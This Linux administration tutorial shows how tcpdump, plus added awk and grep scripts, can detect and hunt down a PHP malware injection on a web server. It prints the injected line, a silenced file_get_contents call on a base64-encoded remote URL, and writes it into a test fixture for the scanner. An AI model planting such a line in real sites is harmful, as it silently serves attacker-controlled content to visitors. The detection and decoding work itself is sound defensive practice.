Using tcpdump to detect malware presence

From lxadm | Linux administration tips, tutorials, HOWTOs and articles

tcpdump can be quite useful for finding malware on a busy server, where the alternative of temporarily stopping the web server (or all traffic) to investigate would affect many users and is therefore not an option.

Note that this only works if the malware makes outbound connections to some external server (to fetch content, report in or download further code); malware that only answers incoming requests will not show up in a capture filtered this way.

An example command:

tcpdump -i eth0 -v -n dst host not 192.168.x.y and dst port 80 and host not 66.155.40.250

Some explanations:

dst host not – put your server's own IP here so that replies to its clients are filtered out; if the server has more IPs, repeat the clause for each one, for example "dst host not 192.168.x.y and dst host not 192.168.a.b" and so on (tcpdump accepts this form; "not dst host 192.168.x.y" is the equivalent and more usual way to write it),
dst port – the malware in this case connects to destination port 80; if nothing shows up, widen it to "(dst port 80 or dst port 443)", since malware fetching over HTTPS is just as common,
host not 66.155.40.250 – we're excluding our own legitimate outgoing traffic to wordpress.com here; add a clause like this for every external host the server is known to talk to, so that what remains is the unexplained traffic.

Finally, run it!

tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes

10:13:36.725262 IP (tos 0x0, ttl 64, id 55, offset 0, flags [DF], proto TCP (6), length 60)
192.168.x.y.39874 > 92.63.104.163.http: Flags [S], cksum 0x42cc (correct), seq 1278554780, win 14600, options [mss 1460,sackOK,TS val 4233900715 ecr 0,nop,wscale 7], length 0
10:13:37.724713 IP (tos 0x0, ttl 64, id 56, offset 0, flags [DF], proto TCP (6), length 60)
192.168.x.y.39874 > 92.63.104.163.http: Flags [S], cksum 0x3ee4 (correct), seq 1278554780, win 14600, options [mss 1460,sackOK,TS val 4233901715 ecr 0,nop,wscale 7], length 0
10:13:39.724742 IP (tos 0x0, ttl 64, id 57, offset 0, flags [DF], proto TCP (6), length 60)
192.168.x.y.39874 > 92.63.104.163.http: Flags [S], cksum 0x3714 (correct), seq 1278554780, win 14600, options [mss 1460,sackOK,TS val 4233903715 ecr 0,nop,wscale 7], length 0

What this says is that the server is repeatedly trying to connect out to 92.63.104.163 – a server operating somewhere in Russia. Note the three SYN packets from the same source port (39874) with the same sequence number (1278554780), sent one and then two seconds apart: these are TCP retransmissions. The kernel only retransmits a SYN when no SYN-ACK came back, so the remote side was not answering at the time of the capture, yet something on our server kept trying.
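On a busy server the interesting destination is buried among hundreds of legitimate ones, so it helps to summarise the capture instead of reading it by eye. The following is an added example, not part of the original lxadm page: two small awk-based filters that take tcpdump output on stdin (in the one-line-per-packet format "tcpdump -nn -l" prints without -v, i.e. numeric ports) and report, per destination, how many bare SYNs our server sent, plus which SYNs were retransmitted with the same sequence number, the sign of an unanswered connection attempt seen above. The sample lines and the addresses 192.168.10.5 and 93.184.216.34 are constructed for the demo; the 92.63.104.163 lines mirror the three retransmitted SYNs in the article. IPv4 only.

```shell
#!/bin/sh
# Added example (not from the lxadm page): summarise a tcpdump capture so a
# repeating outbound destination stands out on a busy server.
# Input format: "tcpdump -nn -l" output without -v (numeric ports, one line
# per packet). The sample below is constructed; the 92.63.104.163 lines mirror
# the three retransmitted SYNs in the article, the other destinations are
# assumed ordinary traffic (one of them includes the SYN-ACK reply, which
# must not be counted as an outbound attempt).
SAMPLE='10:13:36.725262 IP 192.168.10.5.39874 > 92.63.104.163.80: Flags [S], seq 1278554780, win 14600, length 0
10:13:37.724713 IP 192.168.10.5.39874 > 92.63.104.163.80: Flags [S], seq 1278554780, win 14600, length 0
10:13:39.724742 IP 192.168.10.5.39874 > 92.63.104.163.80: Flags [S], seq 1278554780, win 14600, length 0
10:13:40.100001 IP 192.168.10.5.40011 > 66.155.40.250.80: Flags [S], seq 22, win 14600, length 0
10:13:40.150001 IP 66.155.40.250.80 > 192.168.10.5.40011: Flags [S.], seq 900, ack 23, win 65535, length 0
10:13:41.200002 IP 192.168.10.5.40012 > 93.184.216.34.443: Flags [S], seq 23, win 14600, length 0'

# outbound_syns SRC_IP   (reads tcpdump lines on stdin)
# Prints "count dst_ip dst_port" for every destination SRC_IP sent a bare SYN
# to, most frequent first. Replies ("[S.]") and other hosts' packets are
# skipped. Field layout: $3 = src.port, $5 = dst.port:, $7 = flags.
outbound_syns() {
    awk -v src="$1" '
        $2 == "IP" && $7 == "[S]," {
            n = split($3, s, "."); sip = s[1] "." s[2] "." s[3] "." s[4]
            if (sip != src) next
            d = $5; sub(/:$/, "", d)
            n = split(d, t, "."); dip = t[1] "." t[2] "." t[3] "." t[4]
            count[dip " " t[n]]++
        }
        END { for (k in count) print count[k], k }
    ' | sort -rn
}

# retransmitted_syns SRC_IP   (reads tcpdump lines on stdin)
# Prints "count src_port dst_ip.dst_port seq" for SYNs that SRC_IP sent more
# than once with the same sequence number: the kernel is retrying a connection
# nobody answered, which is exactly what the article's capture shows.
retransmitted_syns() {
    awk -v src="$1" '
        $2 == "IP" && $7 == "[S]," && $8 == "seq" {
            n = split($3, s, "."); sip = s[1] "." s[2] "." s[3] "." s[4]
            if (sip != src) next
            d = $5; sub(/:$/, "", d)
            seq = $9; sub(/,$/, "", seq)
            tries[s[n] " " d " " seq]++
        }
        END { for (k in tries) if (tries[k] > 1) print tries[k], k }
    '
}

# Runs both reports over the constructed sample. On a real server feed a live
# capture instead, e.g.
#   tcpdump -i eth0 -nn -l 'src host 192.168.x.y and tcp[tcpflags] & (tcp-syn|tcp-ack) == tcp-syn' \
#     | outbound_syns 192.168.x.y
# (-l line-buffers the output so the pipe sees packets as they arrive).
report() {
    echo "== outbound SYNs per destination =="
    printf '%s\n' "$SAMPLE" | outbound_syns 192.168.10.5
    echo "== SYNs retransmitted (no answer) =="
    printf '%s\n' "$SAMPLE" | retransmitted_syns 192.168.10.5
}
report
```

The SYN-only tcpdump filter in the comment replaces the "dst port 80" approach from the article with one that catches connection attempts to any port; the awk side then does the host exclusions that the article put into the BPF expression, which is easier to adjust while the capture keeps running.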


Further inspection of the server revealed that the malware had been added to templates/rt_mobius/index.php, a template file belonging to Joomla – a CMS with a long history of remote vulnerabilities:

<?php error_reporting(0);@print(file_get_contents(base64_decode("aHR0cDovLzkyLjYzLjEwNC4xNjMvZ2V0LnBocA==")));?>


What does it do?

Read it from the inside out: base64_decode() turns the string into a URL, file_get_contents() fetches whatever that URL serves, and print() writes the response into the page output. error_reporting(0) and the @ in front of print() make sure that nothing is logged or displayed if the fetch fails, which is why the injection stays silent even while the remote server is not answering (as the retransmitted SYNs above show). To see where it points without running the malicious line itself, create an empty PHP file with the following content:

<?php
// Decode only: print() replaces file_get_contents(), so the URL is shown rather than fetched
print(base64_decode("aHR0cDovLzkyLjYzLjEwNC4xNjMvZ2V0LnBocA=="));


Executing it will print out where the malicious code tried to connect (print() is used instead of file_get_contents() so that the URL is shown rather than fetched):

http://92.63.104.163/get.php
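You do not need a PHP interpreter for this step at all, and once one injected file is found it is worth checking whether the same pattern was planted elsewhere in the webroot. The following is an added example, not code from the lxadm page: it decodes the string with base64 -d, then searches a directory tree for PHP files that both silence errors with error_reporting(0) and call base64_decode(), and prints the decoded target of every such literal found. The webroot it searches is a constructed fixture in a temporary directory containing one clean file and one copy of the article's injection; on a real server point find_injected at the actual document root.

```shell
#!/bin/sh
# Added example (not from the lxadm page): decode the injected string without
# running any PHP, and hunt the webroot for other files carrying the same
# pattern. The webroot below is a constructed fixture in a temp directory.

ENCODED='aHR0cDovLzkyLjYzLjEwNC4xNjMvZ2V0LnBocA=='

# decode_b64 STRING: plain base64 decode, no PHP interpreter involved.
decode_b64() {
    printf '%s' "$1" | base64 -d
}

# make_fixture: build a throwaway webroot with one clean file and one file
# carrying the injection quoted in the article; prints the directory path.
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/templates/rt_mobius" "$root/components"
    printf '<?php echo "hello";\n' > "$root/components/clean.php"
    printf '<?php error_reporting(0);@print(file_get_contents(base64_decode("%s")));?>\n' \
        "$ENCODED" > "$root/templates/rt_mobius/index.php"
    echo "$root"
}

# find_injected WEBROOT: relative paths of .php files that both silence errors
# with error_reporting(0) and call base64_decode(. Either alone is common in
# legitimate code; both in one template file is the pattern seen here.
find_injected() {
    root="$1"
    find "$root" -type f -name '*.php' | while read -r f; do
        if grep -qF 'error_reporting(0)' "$f" && grep -qF 'base64_decode(' "$f"; then
            echo "${f#$root/}"
        fi
    done
}

# decoded_targets FILE: pull every base64_decode("...") literal out of FILE
# and print its decoded value, one per line, so you can see where it points.
decoded_targets() {
    grep -o 'base64_decode("[A-Za-z0-9+/=]*")' "$1" \
      | sed 's/^base64_decode("//; s/")$//' \
      | while read -r enc; do
            decode_b64 "$enc"
            echo
        done
}

# demo: run the hunt against the fixture and clean up afterwards.
demo() {
    root=$(make_fixture)
    find_injected "$root" | while read -r f; do
        echo "injected: $f"
        decoded_targets "$root/$f"
    done
    rm -rf "$root"
}
demo
```

Decoding with base64 -d rather than PHP is the safer habit: a hand-written decoder script that does get the call wrong executes the payload, whereas a shell pipeline never interprets it. Running find_injected over the whole document root also catches copies of the injection in other templates, which a single grep for the known URL would miss if the attacker used a different encoded string elsewhere.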